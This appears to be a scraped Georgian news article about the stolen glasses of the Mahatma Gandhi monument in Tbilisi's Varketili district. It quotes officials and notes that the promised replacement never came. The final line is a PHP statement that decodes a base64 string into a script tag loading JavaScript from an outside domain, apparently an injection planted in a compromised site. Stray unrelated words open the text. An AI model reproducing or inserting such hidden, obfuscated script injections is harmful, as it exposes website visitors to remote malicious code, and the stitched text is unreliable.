celsiusi
ავერსი შნაიდერი
მაჰათმა განდის ძეგლი, რომელიც ვარკეთილში 2021 წლის 10 ივლისს საზეიმოდ გახსნეს, 4 აგვისტოს უკვე სათვალის გარეშე იყო და უკვე ერთი წელია მოპარული სათვალის ახლით ჩანაცვლებას უშედეგოდ უცდის. 
 
"მაჰათმა განდის ძეგლი უკვე დაზიანებულია, კერძოდ, მოხსნილია სათვალე, ძეგლს მოპარეს სათვალე, არ ვიცი რა უნდა ვთქვა ამაზე.
 
ძალიან სამწუხაროა ეს ყველაფერი, რთულია მისცე ამ ყველაფერს შეფასება და კიდევ უფრო ძნელია იმის გააზრება" - თქვა კალაძემ.
 
ვარკეთილის მაჟორიტარის რევაზ სოხაძის განცხადებით მაჰათმა განდის ძეგლსთვის ახალ სათვალე უნდა გაეკეთებინათ. ამის შესახებ რაიონის მაჟორიტარმა საინფორმაციო სააგენტო BUSINESS TIME-თან გასული წლის 10 აგვისტოს განაცხადა.
 
“ცუდი და არასასიამოვნო ფაქტია, ახალ სათვალეს გავაკეთებთ,”- განაცხადა სოხაძემ.
 
მიუხედავად ამ დაპირებისა, ძეგლს სათვალე ამ დრომდე არ აქვს. თუმცა, აღსანიშნავია, რომ  მის უსაფრთხოებაზე ზრუნავენ და ძეგლს უკვე სათვალთვალო კამერა იცავს, სხვა დეტალებიც რომ არ მოპარონ, ან დააზიანონ. 
 
 
 
554
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");